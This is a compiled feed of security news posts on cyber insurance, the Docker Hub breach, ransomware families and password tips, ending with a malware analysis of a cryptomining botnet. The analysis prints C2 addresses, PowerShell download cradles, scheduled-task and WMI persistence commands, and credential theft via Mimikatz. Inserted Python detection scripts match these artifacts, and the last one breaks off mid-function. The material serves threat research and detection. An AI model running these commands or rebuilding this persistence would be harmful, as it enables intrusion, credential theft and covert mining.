From this standpoint, Cyber Catalyst seems like not just a good idea, but an obvious one. A standardized metric to determine which cybersecurity solutions are no better than a fig leaf and which ones provide real armor to defend against cyberattacks is sorely lacking in the cybersecurity space. By Marsh’s own estimates, there are more than three thousand cybersecurity vendors amounting to a $114 billion marketplace. Many of them don’t inspire confidence on the part of businesses.

Insurers have a vested interest in determining the effectiveness of cybersecurity products, weeding out buggy software and promoting effective solutions that can help address risk aggregation issues. Businesses and their data are in turn better protected, and at least in theory, they would pay less for coverage. Everyone wins.

Insurance companies did something similar in the 1950s with the creation of the Insurance Institute for Highway Safety. In the face of rising traffic collisions and fatalities, the insurance industry collaborated to establish a set of tests and ratings for vehicles, and the result has been a gold standard for automotive safety for decades. Using a similar strategy for cybersecurity would at least in theory help mitigate the ever-increasing costs and risks to companies and their data.

Or Maybe Not

Where the analogy to the Insurance Institute for Highway Safety breaks down is here: The threats to car drivers and passengers have ultimately stayed the same since its inception. Everything we’ve learned over the years about making cars has progressively led to safer vehicles. Information technology is vastly different in that iterative improvements in one specific area don’t necessarily make an organization as a whole safer or better protected against cyber threats; in fact, sometimes it can have the opposite effect, when a newly added feature turns out to be a bug.

Cyber defenses are meaningless in the presence of an unintended, yet gaping, hole in an organization’s defenses. Then there is the march of sound innovation. Products that provided first-in-class protection for a business’s network a few years ago may no longer be so great where cloud computing and virtual servers, or BYOD are concerned. The attackable surface of every business continues to increase with each newly introduced technology, and it seems overly optimistic to assume the standard evaluation process (currently twice a year) would be able to keep pace with new threats.

There’s also the risk of putting too many eggs into one basket. While the diffuse nature of the cybersecurity market causes headaches for everyone involved, establishing a recommended solution or set of solutions effectively makes them an ideal target for hackers. While it’s important to keep consumers and businesses informed of potential risk to their information, cybersecurity issues require a certain amount of secrecy until they have been properly addressed. Compromising, or even identifying and reporting on a vulnerability before it’s been patched in an industry standard security product, process or vendor practice could cause a potentially catastrophic chain reaction for cyber insurers and their clients.

Culture Eats Strategy for Breakfast

Where the Cyber Catalyst program seems to potentially miss the mark is by overlooking the weakest link in any company’s security (i.e., its users). An advanced cybersecurity system or set of tools capable of blocking the most insidious and sophisticated attack can readily be circumvented by a spear phishing campaign, a compromised smartphone, or a disgruntled employee. Social engineering cannot be systematically addressed. Combatting the lures of compromise requires organizations to foster and maintain a culture of privacy and security.

The risk of employee over-reliance on tools and systems at the expense of training, awareness, and a company culture where cybersecurity is front and center must not be underestimated. While it is easier to opt for the quick and easy approach of purchasing a recommended solution, companies still need a comprehensive and evolving playbook to meet the ever-changing tactics of persistent, sophisticated and creative hackers.

While industry-wide cooperation may be a good thing, it’s vital for companies and insurers alike to recognize that any security program or service is fallible. Without an equal investment in functional cybersecurity, which places as much store in training employees and keeping aware of new threats, the rise in breaches and compromises will continue.

This article originally appeared on Inc.com.

The post What This Report on Cyber Risk Gets Wrong appeared first on Adam Levin.

Attackers breached Docker Hub, grabbed keys and tokens

Docker, the company behind the popular virtualization tool bearing the same name, announced late on Friday that it has suffered a security breach. There was no official public announcement. Instead, the company sent an alert to potentially affected customers and urged them to change their passwords and check their security logs. What happened? “On Thursday, April 25th, 2019, we discovered unauthorized access to a single Hub database storing a subset of non-financial user data,” the … More

The post Attackers breached Docker Hub, grabbed keys and tokens appeared first on Help Net Security.

Beware of 10 Past Ransomware Attacks

One of the biggest malware threats of 2018 was ransomware, and it continues to disrupt businesses and the daily lives of individuals across the world. In 2019 ransomware has taken a new form: security researchers have noted thousands of different ransomware variants looming large on the internet. Ransomware is becoming more sophisticated, and the number of variants is only growing.

We list here some of the most notorious and popular ransomware attacks, as they made waves in the cybersecurity industry over the years.

1. LockerGoga

After an initial infection at the French engineering consulting firm Altran in 2019, it went on to hit several industrial and manufacturing firms, including Norsk Hydro.

LockerGoga is the most destructive type of ransomware, and it appears to have both ransomware and wiper capabilities. The latest variant takes a very different approach from typical ransomware: it forcibly logs victims off the infected device. As a result, the victim is not able to see the ransom instructions on how to recover files.

2. Bad Rabbit

This malware disguises itself as an Adobe Flash installer and spreads via ‘drive-by download’ on compromised websites. The Bad Rabbit ransomware attack follows the wider-reaching NotPetya strains of malicious code and has infected organizations in Eastern Europe and Russia. Using JavaScript the Flash download is injected into the HTML or Java files of the affected websites, and when a user clicks on the malicious installer, the computer locks.

3. Cerber

Cerber is distributed as ransomware-as-a-service (RaaS), an “affiliate program” of sorts for cybercriminals. In exchange for 40 percent of the profits, anyone can buy it and unleash it.

Cerber uses an elaborate phishing campaign and also targets cloud-based Office 365 users. Typically, the victim receives an email with an infected MS Office document attached. Once opened, the ransomware runs silently in the background; while the encryption takes place it gives the user no indication of infection. After the encryption, the user finds ransom notes in the encrypted folders. Cerber accounted for 26% of all ransomware infections in 2017.

4. Dharma

Dharma first struck the world in 2016, and new versions are released regularly. The latest 2019 variants use the file extensions .gif, .AUF, USA, .xwx, .best, and .heets. It is a cryptovirus that uses a contact email address and random combinations of letters to mark encrypted files.

5. GandCrab

Considered the most popular multi-million-dollar ransomware of 2018, GandCrab relies heavily on Microsoft Office macros, VBScript, and PowerShell to avoid detection. One of the few widely deployed ransomware campaigns to use a ransomware-as-a-service model to maximize delivery, GandCrab was first reported at the end of January 2018 and infected over 48,000 nodes within a month.

6. Jigsaw

Named after a horror movie character, Jigsaw not only encrypts the user’s files but also deletes them, which makes it a particularly sadistic kind of ransomware. Anyone infected with Jigsaw should react quickly: victims have a 24-hour deadline to pay the ransom, and if they miss it, the ransomware starts deleting files. Shutting down the computer causes Jigsaw to delete up to 1,000 of the victim’s files.

7. Katyusha

Katyusha was first detected in October 2018. It is an encryption ransomware Trojan that encrypts files, appending an extension to them. Katyusha releases the data for public download if the ransom is not paid. The malware package contains the EternalBlue and DoublePulsar exploits, which are used to spread over the network. It also deletes shadow copies from the system. Katyusha ransomware is commonly delivered to victims via malicious email attachments. Currently, there are no tools capable of cracking Katyusha’s encryption and restoring data free of charge.

8. SamSam

SamSam is most commonly used in targeted ransomware attacks. SamSam has hit a wide range of industries in the US, mainly critical infrastructure such as hospitals, healthcare companies, and city municipalities. Last year, a SamSam attack crippled the city of Atlanta for days and cost taxpayers close to $17 million.

Unlike most ransomware campaigns, SamSam relies on phishing techniques for delivery and uses Remote Desktop Protocol (RDP) to infect victims while avoiding detection.

9. PewCrypt

This ransomware is not after money: its authors only want victims to subscribe to the popular YouTuber PewDiePie and help him reach 100m subscribers, beating the Indian Bollywood channel T-Series. The competition between the two has been going on for several months. PewDiePie fans believe that ransomware is the best way to rally support for their idol. PewDiePie, on the other hand, has not endorsed this move to use malicious tactics to keep him at the top.

PewCrypt spreads through spam email campaigns and websites that host malware or display malicious advertisements.

10. Ryuk

Ryuk debuted in August 2018 as part of a new ransomware family and has made $3.7 million in bitcoin across 52 payments. Normally, ransomware is distributed via spam campaigns and exploit kits, but Ryuk is used in targeted attacks. It mainly focuses on big organizations that can pay a lot of money to recover their files. Ryuk demands ransoms ranging from 15 to 50 bitcoins, and it uses robust military-grade algorithms such as ‘RSA4096’ and ‘AES-256’ to encrypt files and.

When Ryuk ransomware first appeared in 2018, researchers felt it was related to the North Koreans. On closer scrutiny, it was found that Ryuk has its roots in Russia and that its operators had built Ryuk ransomware using Hermes code.

Can ransomware be prevented?

Even though there are ways to recover encrypted files with a decryptor, new tools and ransomware variants are making it difficult to keep pace. The best way to handle ransomware is prevention: follow network security best practices such as keeping regular, up-to-date backups and not downloading suspicious attachments.

Related Resources:

Fileless Ransomware: The Next Big Threat For The US In The Waiting

How to Remove Pewcrypt Ransomware

Ryuk Ransomware – Too Early to Predict The Actors

Bad Actors Still Raking Profit From Ransomware

The post Beware of 10 Past Ransomware Attacks appeared first on .

GE trade secret theft case demonstrates need for document behavior monitoring

A former GE engineer and a Chinese national have been formally charged with 14 counts of economic espionage by the U.S. Department of Justice after stealing trade secrets from GE. The indictment describes the calculated theft of sensitive documents related to the proprietary design of GE’s gas and steam turbines. According to the unsealed indictment, the engineer at GE Power & Water in Schenectady, New York “exploited his access to GE’s files by stealing multiple … More

The post GE trade secret theft case demonstrates need for document behavior monitoring appeared first on Help Net Security.

The leading sources of stress for cybersecurity leaders? Regulation, threats, skills shortage

A perfect storm of regulation, increased threats and technological complexity is overwhelming cybersecurity decision makers, reveals new research from Symantec. Cybersecurity suffers from information overload: four in five (82 percent) security leaders across France, Germany and the UK report feeling burned out, whilst just under two-thirds (63 percent) think about leaving the industry or quitting their job (64 percent). Surveying 3,045 cybersecurity decision makers across France, Germany and the UK, the research – … More

The post The leading sources of stress for cybersecurity leaders? Regulation, threats, skills shortage appeared first on Help Net Security.

Most SMBs would pay a ransom in order to recover stolen data

More than half (55 percent) of executives at SMBs said they would pay hackers in order to recover their stolen data in ransomware attacks, according to the second quarterly AppRiver Cyberthreat Index for Business Survey. That number jumps to 74 percent among larger SMBs that employ 150-250 employees, with nearly 4 in 10 (39 percent) going as far as saying they “definitely would pay ransom at almost any price” to prevent their data from being … More

The post Most SMBs would pay a ransom in order to recover stolen data appeared first on Help Net Security.

What Can League of Legends Teach Us About Cybersecurity?

The League of Legends game and human psychology are two things we don’t often associate with cybersecurity. As an avid gamer, I encountered and observed many parallels between the tactics used to win games like League of Legends and the mentality that guides human behavior in general. Thus, when I began teaching security awareness and […]… Read More

The post What Can League of Legends Teach Us About Cybersecurity? appeared first on The State of Security.

Security Affairs newsletter Round 211 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Once again thank you!

60 Million records of LinkedIn users exposed online
INPIVX hidden service, a new way to organize ransomware attacks
Ride-Hailing Company operating in Iran exposes data of Iranian Drivers
A flaw in the Shopify API exposed revenue and traffic data of thousands of stores
Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT
jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites
Russian Twitter bot activity increased in the wake of the Mueller report release
Bodybuilding.com forces password reset after a security breach
EmCare reveals patient and employee data were hacked
FireEye experts found source code for CARBANAK malware on VirusTotal
Iran-linked APT34: Analyzing the webmask project
Targeted Attacks hit multiple embassies with Trojanized TeamViewer
Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer
OilRig APT uses Karkoff malware along with DNSpionage in recent attacks
Stuart City is the new victim of the Ryuk Ransomware
The Russian Shadow in Eastern Europe: Gamaredon’s Ukrainian MOD Campaign
Zero-day vulnerability in Oracle WebLogic
A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites
Britain ‘Approves’ Huawei role in building ‘non-core’ parts for 5G Network
Crooks abuse GitHub platform to host phishing kits
Flaws in Social Warfare plugin actively exploited in the wild
Beapy Cryptojacking campaign leverages EternalBlue exploit to spread
Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws
The strengths and weaknesses of different VPN protocols
Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices
Docker Hub Database hacked, 190,000 users impacted
Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension
Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites

Pierluigi Paganini

(SecurityAffairs – newsletter, cybersecurity)

The post Security Affairs newsletter Round 211 – News of the week appeared first on Security Affairs.

Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’


As adults, we know the importance of strong passwords, and we’ve likely preached the message to our kids. But let’s rewind for a minute. Do our kids understand why strong passwords are important and why they need to become a habit, much like personal health and hygiene?

If we want the habit to stick, the reason why can’t be simply because we told them so. We’ve got to make it personal and logical.

Think about the habits you’ve already successfully instilled and the reasoning you’ve attached to them.

Brush your teeth to prevent disease and so they don’t fall out.
Eat a balanced diet so you have fuel for the day and to protect yourself from illness and disease.
Get enough sleep to restore your body and keep your mind sharp for learning.
Bathe and groom to wash away germs (and to keep people from falling over when you walk by). 

The same reasoning applies to online hygiene: We change our passwords (about every three months) to stay as safe as possible online and protect what matters. When talking to kids, the things that matter include our home address, our school name, our personal information (such as a parent’s credit card information, our social security number, or other account access).

Kids Targeted

We falsely believe that an adult’s information is more valuable than a child’s. On the contrary, given a choice, 10 out of 10 hackers would mine a child’s information over an adult’s because it’s unblemished. Determined identity thieves will use a child’s Social Security number to apply for government benefits, open bank and credit card accounts, apply for a loan or utility service, or rent an apartment. Also, once a child’s information is hacked, a thief can usually get to a parent’s information.

How to Stay Safe

It’s a tall task to prevent some of the massive data breaches in the news that target kids’ information. However, what is in our control is the ability to practice and teach healthy password habits in our home.

Tips for Families

Shake it up. According to McAfee Chief Consumer Security Evangelist Gary Davis, to bulletproof your passwords, make sure they are at least 12 characters long and include numbers, symbols, and upper- and lowercase letters. Consider substituting numbers and symbols for letters, such as zero for “O” or @ for “A”.

Encourage kids to get creative and create passwords or phrases that mean something to them. For instance, advises Gary, “If you love crime novels you might pick the phrase: ILoveBooksOnCrime. Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as 1L0VEBook$oNcRIM3!”

Three random words. Password wisdom has morphed over the years as we learn more and more about hacking practices. According to the National Cyber Security Centre, another way to create a strong password is by using three random words (not birthdates, addresses, or sports numbers) that mean something to you. For instance: ‘lovepuppypaws’ or ‘drakegagacardib’ or ‘eatsleeprepeat’ or ‘tacospizzanutella’.

More than one password. Creating a new password for each account will head off cybercriminals if any of your other passwords are cracked. Consider a password manager to help you keep track of your passwords.

Change product default passwords immediately. If you purchase products for kids such as internet-connected gaming devices, routers, or speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

When shopping online, don’t save info. Teach kids not to save credit card information when shopping on their favorite retail or gaming sites. Saving personal information to different accounts may speed up the checkout process. However, it also puts that data at risk.

Employ extra protection. Comprehensive security software can protect you from several threats such as viruses, identity theft, privacy breaches, and malware designed to grab your data. Security software can cover your whole family as well as multiple devices.

Web Advisor. Keep your software up-to-date with a free web advisor that helps protect you from accidentally typing passwords into phishing sites.


Use unique passwords and MFA. This is also called “layering up.” 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if one is hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication). MFA confirms a user’s identity only after the user presents two or more pieces of evidence. Though not 100% secure, this practice adds a layer of security to an account.

Keep it private. Kids love to show one another loyalty by sharing passwords and giving one another access to their social network accounts. DO NOT encourage this behavior. It’s reckless and could carry some serious privacy consequences. (Of course, sharing with parents is recommended.)

Credential Cracking

According to the Identity Theft Resource Center® (ITRC), the reported number of consumer records exposed containing sensitive personally identifiable information jumped 126 percent in 2018. The report explicitly stated password cracking as an issue: “The exploitation of usernames and passwords by nefarious actors continues to be a ripe target due to the increase in credential cracking activities – not to mention the amount of data that can be gleaned by accessing accounts that reuse the same credentials.”

May 2 is World Password Day and the perfect time to consider going over these password basics with your family.

The post Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’ appeared first on McAfee Blogs.

Miners snatching open source tools to strengthen their malevolent power!

Estimated reading time: 10 minutes

Over the last year, Quick Heal Security Labs has observed a rise in the number of mining malware samples. One way to earn cryptocurrencies is to mine them, and cryptocurrency-mining malware has become a hot attack vector for cybercriminals thanks to its ease of deployment and instant return on investment. We usually observe such miners arriving through a variety of delivery techniques. Rather than writing their own modules from scratch, attackers can download original open source software and slightly modify it.

In this blog post, we discuss a couple of cases where the attack scenario is built on top of these open source tools. We also discuss how the trend of abusing open source tools to build new malware is helping malware authors.

The trend is observed especially in cryptojacking cases. Though cryptojacking is a direct source of income for cybercriminals, information stolen from victims’ systems can yield additional money for them. So, these open source tools are used for various purposes such as downloader frameworks, information stealing, crypto-mining, DNS changers, Mirai bots and many more. This helps a lot in forming a botnet of similar hosts to produce more hashes per second. Such open source tools are often easily available on GitHub and similar platforms. We can classify them as exploit frameworks, vulnerability scanners, password stealers, privilege escalators, evaders, etc.

Infection vector:

We received a miner downloader which downloads multiple components of the attack. This script may reach your system through spam mails, malicious URLs, free software bundlers or any of the conventional methods used by other malware variants. We also suspect that a PowerShell script is the initial culprit. The behavior of the miner is somewhat recursive in nature, so we could not confirm its initial trace on the system.

Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named ‘xpdown.dat’ which contains the IP addresses of the C2 servers from which it downloads further components.

45.58.135.106
103.95.28.54
103.213.246.23
74.222.14.61
Ok.xmr6b.ru

It then downloads the following files from those servers:

hxxp://45.58.135.106/xpdown.dat
hxxp://45.58.135.106/down.html
hxxp://45.58.135.106/ok/64.html

This file contains the IP address (174.128.248.10) from which the CPU miner is downloaded.

hxxp://45.58.135.106/kill.txt

This file contains the following list of processes to kill if they are running on the victim machine:

lsmose.exe, lsmos.exe, conime.exe, lsmosee.exe, 1.exe, lsazs.exe, tasksche.exe, Zationa.exe,
csrs.exe, shennong.bat, svshpst.exe, Spoolvs.exe, svchsot.exe, xmrig.exe, srvany.exe, WinSCV.exe,
csrswz.exe, csrs.exe, seser.exe, severxxs.exe, mssecsvc.exe, mssecsvr.exe, dsbws.exe

The malware then downloads a text file which contains the information on the multiple payloads to be downloaded.

hxxp://45.58.135.106/down.txt

This down.txt contains the following links (with the path each payload is saved to). The malware then opens TCP port 32381 on the system.

hxxp://213.183.45.201/downs.exe    (C:\windows\system\downs.exe)
hxxp://66.117.6.174/ups.rar        (C:\windows\system\cab.exe)
hxxp://213.183.60.7/b.exe          (C:\windows\inf\msief.exe)
hxxp://174.128.239.250/item.dll    (C:\windows\debug\item.dat)

Looking at the links in the file, we observed the following.

Downs.exe is a modified version of the Microsoft “CACLS” utility (which displays and modifies access control lists). Ups.rar is downloaded as cab.exe. This component is a downloader for the Windows variant of the Mirai botnet; it also acts as a DNS changer and opens a backdoor on the system. On execution, it performs multiple operations, such as modifying the DNS entry on the host to the IP “223.5.5.5”, which is geolocated in China; the ISP of that DNS server is “Hangzhou Alibaba Advertising Co.,Ltd.”


Fig. 2 Window Server Check


It then checks whether the compromised machine is a Windows server or not by calling GetVersionExA. If the machine is a server, it downloads update.txt from the C2 server and drops it at “C:\windows\system\uplist.txt”. The uplist.txt file lists the following payloads to be downloaded and executed:

hxxp://66.117.6.174/wpd.jpg     (C:\windows\system\msinfo.exe)
hxxp://66.117.6.174/my1.html    (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These files are used for network packet processing and are loaded by msinfo.exe during its execution.

Let’s look into these components one by one.

my1.bat:

It contains code that is very stealthy and evasive, as it uses several techniques such as “Squiblydoo”, a “download cradle” and WMI event subscription persistence to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://173.208.139.170/s.txt')

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://74.222.1.38/up.txt')

“Up.txt” contains code which collects information about the system OS, physical memory and the list of running processes using WMI classes, and then downloads the PowerShell version of Mimikatz from GitHub.

It then steals credentials from the compromised machine and uploads them to the FTP server at IP 192.187.111.66 using hard-coded FTP credentials.

Fig. 3 Victims Data in FTP Server.

Msinfo.exe:

It is basically a Windows version of the Mirai botnet, as much of its code matches the previously leaked Mirai source code. Upon execution with the command line parameters “-create” and “-run”, it checks the architecture of the current system (x86, MIPS, ARM, etc.). Based on that identification, it checks for its latest update and downloads it if available.

It performs the following tasks as directed by an encrypted file downloaded from the C2 server.

  1. Implements a spreader mechanism using blind SQLi (SQL injection) and brute-force techniques based on a cracker library and the hydra tool:
              [Cracker:Telnet] [Cracker:MSSQL] [Cracker:CCTV] [Cracker:MS17010], CrackerWMI, CrackerSSH
  2. Scans various ports such as 80, 8000 and 445 using masscan (a very fast open source port scanner which operates similarly to nmap, the popular port scanning tool):
              https://github.com/robertdavidgraham/masscan
  3. Disables specific services by invoking the following command:
              C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled
  4. Performs a network scan, for which it collects the public/private IP of the system and all the associated information such as geolocation. The attacker then spoofs his own IP against the current system IP and, using masscan, scans other devices.

Through these steps it turns the system into a bot and adds it to the botnet. The code is developed in C++ and distributed across many source files such as:

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
CThreadPool.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
cService.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp
WPD.cpp

It basically targets IoT devices running embedded Linux, so it uses BusyBox (a software suite that provides UNIX utilities, also called the Swiss Army Knife of embedded Linux) to execute remote commands after compromising/cracking those devices through the various methods mentioned above.

VBS/BAT Agent For Download Miner:

First, the payload is dropped and executed at the location below on the victim machine.

hxxp://213.183.60.7/b.exe    (downloaded at C:\windows\inf\msief.exe)

On execution, it drops a VBS file and a batch file at the locations below and executes the VBS file by invoking wscript.exe, which eventually executes the bat file.

C:\Windows\web\c3.bat
C:\Windows\web\n.vbs

The bat file contains a lot of code which modifies the attributes of some folders/files, kills specific processes, deletes some files, modifies the access control of some folders/files, establishes persistence for multiple payloads via the registry, the task scheduler and WMI event subscriptions, and also modifies the firewall policy by blocking ports 445 and 139.


Fig. 4 Part of C3.bat code

There are also two additional payloads downloaded from one of the C2 servers listed in xpdown.dat. One is a disk writer, a DLL file dropped at “C:\Windows\debug”. It executes at system start because the above bat file adds a task scheduler entry for it:

schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F

The second is the final payload, i.e. the XMRig Monero miner, a 64-bit executable downloaded from hxxp://174.128.248.10/64.rar to “C:\windows\debug\lsmos.exe”.

On execution, it unpacks itself and drops three files into the current execution folder: one executable (lsmose.exe, 64-bit, packed with VMProtect) and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll) which the miner needs to run successfully.
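The command-line artifacts walked through in this first case (the PowerShell download cradles, the "Mysa1" rundll32 task, the taskkill/sc service-disable chain, the miner process names) can be turned into simple process-creation log checks. The following is an added example, not Quick Heal's or Seqrite's code; it runs over plain command-line strings, and the SAMPLE_LOG entries, URL and host names are constructed placeholders, not the IOCs from the write-up.

```python
"""Flag the command-line artifacts described in the analysis above.

Added example, not Quick Heal's or Seqrite's code. Input is a sequence of
command-line strings (e.g. the CommandLine field of process-creation
events); SAMPLE_LOG below is constructed for the demo.
"""
import re

# One regex per behaviour from the write-up: PowerShell download cradle,
# schtasks persistence via rundll32 on a .dat payload, the taskkill + sc
# service-disable chain, and powercfg disabling standby/hibernate.
RULES = [
    ("powershell_download_cradle",
     re.compile(r"IEX\s*\(\s*New-Object\s+System\.Net\.WebClient\s*\)"
                r"\s*\.DownloadString", re.I)),
    ("schtasks_rundll32_dat",
     re.compile(r"schtasks\s+/create.*rundll32(\.exe)?\s+\S+\.dat,", re.I)),
    ("service_disable_chain",
     re.compile(r"taskkill\s+/f.*&\s*sc\s+stop\s+\S+\s*&\s*sc\s+config.*"
                r"start=\s*disabled", re.I)),
    ("powercfg_disable_sleep",
     re.compile(r"powercfg\s+/CHANGE\s+-(standby|hibernate)-timeout-ac\s+0\b",
                re.I)),
]

# Names from the write-up: the miner's own kill list (competing miners)
# and the XMRig payload it drops as lsmos.exe / lsmose.exe.
KNOWN_MINER_NAMES = {"xmrig.exe", "lsmos.exe", "lsmose.exe", "lsmosee.exe"}


def image_name(cmdline):
    """Lower-cased basename of the executable that starts the command line."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):          # quoted path, may contain spaces
        exe = cmdline[1:].split('"', 1)[0]
    else:
        exe = cmdline.split(None, 1)[0] if cmdline else ""
    return exe.replace("\\", "/").rsplit("/", 1)[-1].lower()


def scan_line(cmdline):
    """Return the names of every rule that matches one command line."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if image_name(cmdline) in KNOWN_MINER_NAMES:
        hits.append("known_miner_process_name")
    return hits


def scan_log(cmdlines):
    """Scan a sequence of command lines; one finding per matching line."""
    findings = []
    for lineno, cmdline in enumerate(cmdlines, start=1):
        hits = scan_line(cmdline)
        if hits:
            findings.append({"line": lineno, "rules": hits, "cmdline": cmdline})
    return findings


# Constructed sample: entries 1, 3, 5, 6 and 8 mimic the write-up's
# artifacts (with placeholder URL); the rest are ordinary admin commands.
SAMPLE_LOG = [
    r"powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://c2.example.invalid/s.txt')",
    r"powershell.exe -NoProfile -Command Get-Process | Sort-Object CPU",
    r'schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F',
    r"schtasks /query /fo LIST",
    r"C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm start= disabled",
    r"powercfg /CHANGE -standby-timeout-ac 0",
    r"powercfg /list",
    r"C:\windows\debug\lsmos.exe",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']}: {', '.join(finding['rules'])}")
```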

In another, similar case we observed a base64-encoded PowerShell script which is basically cryptomining malware hiding in a WMI class to evade AV and most security products, thanks to this stealthy and unusual technique.

After decoding we get the following code:

Fig. 5 Base64 Decoded script


The following is the basic workflow of the malware.

Fig. 6 Basic workflow of miner with WMI class

On execution, it checks whether the IP/domain mentioned in the code is alive. If it is, it requests a banner and receives the response ‘SCM Event1 Log’.

Fig. 7 Request for “banner” and another PowerShell Payload

After that, the malware queries the ‘__FilterToConsumerBinding’ WMI class by executing the command below

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and then checks whether the result contains ‘SCM Event1 Log’. If it is not present, it downloads and executes in6.ps1 (64-bit) or in3.ps1 (32-bit) via Invoke-Expression (IEX).


Fig. 8 Request for powershell script

in6.ps1/in3.ps1:

These scripts consist of two parts: the first is a base64-encoded gzip data stream and the second contains obfuscated code. After de-obfuscation, the code resembles the initial base64-encoded script, with additional features.

Fig 9 decoded in6.ps1

The encoded gzip contains the four files listed below:

  1. ‘mini’ – Mimikatz, a credential stealer
  2. ‘mon’ – Monero CPU miner
  3. ‘funs’ – Collection of functions, including one to execute a remote DLL via WMI and an EternalBlue vulnerability scanner
  4. ‘sc’ – Shellcode to execute on other systems and download the same payload if they are vulnerable to EternalBlue

It creates a WMI class “systemcore_Updater0” under the namespace “root\default” and adds properties such as mimi, mon, funs, sc, ipsu and i17.

Fig 10 Properties of WMI Class “systemcoreUpdater0”

Then it sets filtername=”SCM Event1 Log Filter” and consumername=”SCM Event1 Log Consumer”.

When an attacker uses WMI as a persistence mechanism, instances of __EventFilter, __EventConsumer and __FilterToConsumerBinding have to be created, and an __InstanceCreationEvent event is fired.

In this case, the attacker uses the following query as the EventFilter and binds it to the initial base64-encoded script, which consequently gets executed approximately every 3 hours.

SELECT * FROM __InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System
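The filter/consumer/binding triple described above can be triaged offline once the root\subscription objects have been exported. The following is an added example, not Quick Heal's or Seqrite's code: it takes plain dicts standing in for __EventFilter, CommandLineEventConsumer and __FilterToConsumerBinding instances (how you export them, e.g. with Get-CimInstance -Namespace root/subscription, is up to you), and all records, the "LowDisk" objects and the encoded-command placeholder are constructed for the demo.

```python
"""Triage WMI permanent event subscriptions for the persistence pattern above.

Added example, not Quick Heal's or Seqrite's code. Filters, consumers and
bindings are plain dicts mirroring the WMI instance properties; the sample
records below are constructed.
"""
import re

# SELECT * FROM <intrinsic event> [WITHIN <poll seconds>] WHERE TargetInstance ISA <class>
WQL_RE = re.compile(
    r"SELECT\s+\*\s+FROM\s+(?P<event>__\w+)"
    r"(?:\s+WITHIN\s+(?P<within>\d+))?"
    r"\s+WHERE\s+TargetInstance\s+ISA\s+['\"]?(?P<target>\w+)['\"]?",
    re.I,
)
# Download-cradle / encoded-command markers in a consumer command line.
CRADLE_RE = re.compile(
    r"DownloadString|Invoke-Expression|\bIEX\b|-e(nc(odedcommand)?)?\b|FromBase64String",
    re.I,
)
# Binding Filter/Consumer fields are object paths such as
# __EventFilter.Name="SCM Event1 Log Filter"; pull the Name out of them.
NAME_RE = re.compile(r'Name="([^"]*)"')

# Polling a perf-counter class emulates a timer: the trigger fires on every
# poll without any real system event, which is what the write-up describes.
TIMER_TARGET = "win32_perfformatteddata_perfos_system"


def parse_filter_query(query):
    """Split a filter's WQL into event class, WITHIN interval and target class."""
    m = WQL_RE.search(query)
    if not m:
        return None
    within = int(m.group("within")) if m.group("within") else None
    return {"event": m.group("event"), "within_seconds": within,
            "target": m.group("target")}


def interval_hours(seconds):
    return seconds / 3600.0


def ref_name(path):
    m = NAME_RE.search(path)
    return m.group(1) if m else path


def triage(filters, consumers, bindings):
    """Return one verdict per binding with the reasons it was flagged."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {c["Name"]: c for c in consumers}
    results = []
    for b in bindings:
        fname, cname = ref_name(b["Filter"]), ref_name(b["Consumer"])
        flt, con = by_filter.get(fname), by_consumer.get(cname)
        reasons = []
        if flt is None or con is None:
            reasons.append("binding references a missing filter or consumer")
        parsed = parse_filter_query(flt["Query"]) if flt else None
        if parsed:
            if (parsed["event"].lower() == "__instancemodificationevent"
                    and parsed["target"].lower() == TIMER_TARGET):
                reasons.append("timer-style trigger on PerfOS_System")
            if parsed["within_seconds"] and parsed["within_seconds"] >= 3600:
                reasons.append("long polling interval (%.1f h)"
                               % interval_hours(parsed["within_seconds"]))
        command = (con or {}).get("CommandLineTemplate", "")
        if CRADLE_RE.search(command):
            reasons.append("consumer runs a download cradle or encoded PowerShell")
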